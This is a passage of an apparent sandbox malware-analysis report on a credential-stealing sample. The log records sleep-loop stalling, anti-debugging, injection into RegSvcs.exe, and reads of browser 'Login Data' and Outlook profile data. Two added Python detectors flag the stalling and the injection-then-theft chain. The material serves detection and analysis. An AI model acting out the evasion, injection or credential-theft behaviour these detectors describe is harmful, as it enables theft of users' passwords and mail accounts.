              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596783Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596487Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593992Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593867Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593756Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593516Jump to behavior
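The delay series above is worth reading as a whole rather than line by line: one call for 922337203685477 (Int64.MaxValue 100-ns ticks expressed in milliseconds, which is what .NET's TimeSpan.MaxValue converts to, so the report's values are milliseconds and 600000 is ten minutes) followed by a run that starts at 600000 and shrinks by roughly 110 to 130 per call. That shape is consistent with a loop that recomputes the time left until a fixed deadline and sleeps for the remainder, so a sandbox that merely shortens each individual sleep is handed the next, slightly shorter, request. The script below is an added example and is not part of the Joe Sandbox report or of the sample; it takes the delay values as the report prints them and flags both the oversized wait and the descending run. The sandbox budget and the per-step threshold are assumptions.

```python
"""Spot deadline-style stalling in a sandbox 'Thread delayed' trace.

Added example; not code from the Joe Sandbox report or from the sample.
The delay values below are copied from the report (milliseconds, as the
sandbox prints them); the budget and thresholds are assumptions.
"""
from dataclasses import dataclass

# .NET TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10_000 ticks per ms.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # 922337203685477

# Constructed input: the first eight delays the report lists for RegSvcs.exe.
REPORTED_DELAYS_MS = [
    922337203685477, 600000, 599875, 599739, 599553, 599391, 599265, 599156,
]


@dataclass
class StallRun:
    start_index: int   # index into the (finite) delay list
    length: int        # number of consecutive, strictly decreasing calls
    first_ms: int      # the whole stall the loop is aiming for
    last_ms: int
    mean_step_ms: float  # average drop per call, i.e. one loop iteration


def find_descending_runs(delays, min_len=3):
    """Return maximal runs of strictly decreasing delays with at least min_len calls."""
    runs = []
    i, n = 0, len(delays)
    while i < n:
        j = i
        while j + 1 < n and delays[j + 1] < delays[j]:
            j += 1
        length = j - i + 1
        if length >= min_len:
            step = (delays[i] - delays[j]) / (length - 1)
            runs.append(StallRun(i, length, delays[i], delays[j], step))
        i = j + 1
    return runs


def classify(delays, sandbox_budget_ms=5 * 60_000, max_step_ms=1_000):
    """Label a trace. The budget and step threshold are assumptions, not report values."""
    findings = []
    if any(d >= TIMESPAN_MAX_MS for d in delays):
        findings.append("infinite_sleep")            # TimeSpan.MaxValue-sized wait
    finite = [d for d in delays if d < TIMESPAN_MAX_MS]
    for run in find_descending_runs(finite):
        # A deadline loop re-sleeps for "deadline - now": successive values fall
        # by about one loop iteration, and the first value is the whole stall.
        # A stall longer than the analysis budget, made of short steps, is evasive.
        if run.first_ms > sandbox_budget_ms and 0 < run.mean_step_ms <= max_step_ms:
            findings.append("deadline_stall_loop")
            break
    return findings


if __name__ == "__main__":
    print(classify(REPORTED_DELAYS_MS))
```

The point of flagging the run rather than any single value is operational: a sleep-skipping hook that returns early from each call defeats a single long Sleep but not this loop, because the next call is computed from the wall clock; the trace has to be judged by its total requested stall, which is the first value of the run.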
              Source: RegSvcs.exe, 00000003.00000002.4185989796.0000000001230000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | API call chain: ExitProcess graph end node (graph_0-100425)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | API call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00383F09 BlockInput
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00345A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00314B37 LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_012F9020 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_012FA630 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_012FA690 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 2_2_016BF1C8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 2_2_016BF228 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 2_2_016BDBB8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_003680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0033A124 SetUnhandledExceptionFilter
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0033A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_004123F1 SetUnhandledExceptionFilter
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C35008
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_003687B1 LogonUserW
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00374C27 mouse_event
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\njVvgA8pEB.exe"
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00367CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0036874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
              Source: njVvgA8pEB.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: njVvgA8pEB.exe | Binary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_0033862B cpuid
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00417A20 GetLocaleInfoA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00344E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00351E06 GetUserNameW
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_00343F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
              Source: C:\Users\user\Desktop\njVvgA8pEB.exe | Code function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: njVvgA8pEB.exe, 00000000.00000002.1722942325.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712410523.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000000.00000003.1712523859.0000000001210000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722715485.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000003.1722581179.0000000001563000.00000004.00000020.00020000.00000000.sdmp, njVvgA8pEB.exe, 00000002.00000002.1740455255.00000000015CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

              Stealing of Sensitive Information

              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb0bee.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.4296458.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000003.00000002.4188901545.00000000056D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186590756.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4187157369.0000000003426000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4188676018.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000003.00000002.4186778603.00000000031D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
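The evidence in this section and in the HIPS / PFW / Operating System Protection Evasion section above fits together as one chain: RegSvcs.exe is started with the parent's own path as its command line, the parent maps an execute/read/write section into it and writes to it (base C35008), and the resulting RegSvcs.exe process (PID 7300) then opens the Chrome and Edge "Login Data" stores and the Outlook profile key. The following is an added example, not code from the Joe Sandbox report or from the sample, that correlates those behaviours from a stream of events so that each indicator is scored on its own and the combination is escalated. The event schema is my own simplification (an assumption, not Joe Sandbox's or Sysmon's format), the records are constructed from the lines above, every process ID except 7300 is made up, and the allow-lists of processes permitted to touch those stores are assumptions as well.

```python
"""Correlate sandbox-style behaviour events into the injection-then-stealing chain.

Added example; not code from the Joe Sandbox report or from the sample. The
event records are constructed from the behaviours the report lists, in a
simplified schema of my own (an assumption, not Joe Sandbox's or Sysmon's
format). Process IDs other than 7300 (RegSvcs.exe, from the report) are made up.
"""
import ntpath
from collections import defaultdict

PARENT = r"C:\Users\user\Desktop\njVvgA8pEB.exe"
HOST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed events, in the order they would be observed.
EVENTS = [
    {"type": "process_create", "pid": 7300, "ppid": 4100, "image": HOST,
     "cmdline": f'"{PARENT}"'},
    {"type": "memory_write", "pid": 4100, "target_pid": 7300, "base": 0xC35008},
    {"type": "file_open", "pid": 7300,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_open", "pid": 7300,
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"type": "reg_open", "pid": 7300,
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
]

# Processes that legitimately touch these stores (assumption: a minimal allow-list).
BROWSER_OWNERS = {"chrome.exe", "msedge.exe"}
MAIL_OWNERS = {"outlook.exe"}


def argv0_basename(cmdline):
    """Lower-cased file name of the first token of a Windows command line (quoted or not)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        first = s[1:end] if end > 0 else s[1:]
    else:
        first = s.split(" ", 1)[0]
    return ntpath.basename(first).lower()


def analyse(events):
    """Return {pid: sorted indicator names} for every process that tripped at least one."""
    image = {}                     # pid -> image path seen at process creation
    hits = defaultdict(set)
    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process_create":
            image[pid] = ev["image"]
            # Hollowing artefact: the executable that was started is not the one
            # named in its own command line (RegSvcs.exe started with the parent's
            # path as argv[0]).
            if argv0_basename(ev["cmdline"]) != ntpath.basename(ev["image"]).lower():
                hits[pid].add("cmdline_image_mismatch")
        elif ev["type"] == "memory_write" and ev["target_pid"] != pid:
            hits[ev["target_pid"]].add("foreign_memory_write")
        elif ev["type"] == "file_open":
            name = ntpath.basename(image.get(pid, "")).lower()
            if ntpath.basename(ev["path"]) == "Login Data" and name not in BROWSER_OWNERS:
                hits[pid].add("browser_credential_store_access")
        elif ev["type"] == "reg_open":
            name = ntpath.basename(image.get(pid, "")).lower()
            if "Windows Messaging Subsystem\\Profiles" in ev["key"] and name not in MAIL_OWNERS:
                hits[pid].add("mail_profile_access")
    # Escalate: a process that was written into or started under a false
    # command line, and then reads credential stores, is an injected stealer.
    for found in hits.values():
        injected = found & {"cmdline_image_mismatch", "foreign_memory_write"}
        stealing = found & {"browser_credential_store_access", "mail_profile_access"}
        if injected and stealing:
            found.add("injected_stealer")
    return {pid: sorted(found) for pid, found in hits.items()}


if __name__ == "__main__":
    for pid, found in analyse(EVENTS).items():
        print(pid, ", ".join(found))
```

The command-line check is the cheap one: a legitimate start of RegSvcs.exe carries its own path or name as the first token, so a first token naming a different executable is a strong hollowing indicator even without memory telemetry; the foreign-write and credential-store checks turn it into the full chain the report documents.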
              Source: njVvgA8pEB.exe | Binary or memory string: WIN_81
              Source: njVvgA8pEB.exe | Binary or memory string: WIN_XP
              Source: njVvgA8pEB.exe | Binary or memory string: WIN_XPe
              Source: njVvgA8pEB.exe | Binary or memory string: WIN_VISTA
              Source: njVvgA8pEB.exe | Binary or memory string: WIN_7
              Source: njVvgA8pEB.exe | Binary or memory string: WIN_8
              Source: njVvgA8pEB.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
              Source: Yara match | File source: 3.2.RegSvcs.exe.4295570.6.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.56d0000.8.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.2eb1ad6.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0ee8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.42be590.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.RegSvcs.exe.31d0000.4.raw.unpack, type: UNPACKEDPE
